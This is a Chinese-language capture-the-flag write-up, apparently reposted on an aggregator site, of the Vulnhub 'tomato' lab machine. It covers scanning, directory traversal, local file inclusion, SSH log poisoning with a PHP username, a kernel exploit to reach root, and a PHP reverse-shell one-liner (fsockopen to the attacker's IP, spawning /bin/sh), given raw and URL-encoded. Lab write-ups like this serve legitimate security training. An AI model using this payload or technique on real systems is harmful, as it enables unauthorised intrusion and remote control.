Vulnhub靶机tomato渗透

编程入门 行业动态 更新时间:2024-10-19 23:34:30

Vulnhub<a href=https://www.elefans.com/category/jswz/34/1753072.html style=靶机tomato渗透"/>

Vulnhub靶机tomato渗透

靶机介绍
官方下载地址:,557/
该靶机目标是获取root目录下的flag,难度是中等到困难

运行环境:
靶机:网络连接方式设为自动桥接,IP地址:192.168.1.86
攻击机:通网段下的kali linux,IP地址:192.168.1.44
开始渗透
运行靶机

获取IP地址

扫描端口及其服务

扫描目录

开始访问
80端口首页是一张图片,源代码也没有获取有用的信息

server-status是一个目录
antibot_image发现目录遍历漏洞

在http://192.168.1.86/antibot_image/antibots/info.php的源代码当中发现了文件包含的命令

使用文件包含,可以包含成功

查看ssh服务的日志文件,在日志里面发现tomato用户

尝试使用php代码作为用户名进行注入

判断是否注入成功,加入参数执行发现执行成功

既然php代码可以注入成功,就可以利用php来反弹shell
开启监听,执行下面这条语句,需要进行url编码否则不会被解析
源代码:php±r+’$sock=fsockopen(“192.168.1.44”,4444);exec("/bin/sh±i+<&3+>&3+2>&3");’
url编码之后:php±r+%27%24sock%3dfsockopen(%22192.168.1.44%22%2c4444)%3bexec(%22%2fbin%2fsh±i+%3c%263+%3e%263+2%3e%263%22)%3b%27

反弹成功,利用python交互,打开终端

想办法提权,
查了一个系统版本,再使用searchsploit查了一下发现有可利用的漏洞


使用44300.c提权失败了,经过百度之后使用github上面的一个脚本

由于靶机的gcc命令不能使用所以在kali将脚本进行编译,再下载到靶机上面

将编译好的文件放到临时的http服务上面



下载成功之后赋予文件权限并执行该文件


已经提权到root
可能是因为物理机电脑CPU不兼容,虚拟机报错,无法查看flag
靶机到这里已经算完成了

更多推荐

Vulnhub靶机tomato渗透

本文发布于:2024-03-07 20:44:29,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1718875.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:靶机   Vulnhub   tomato

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!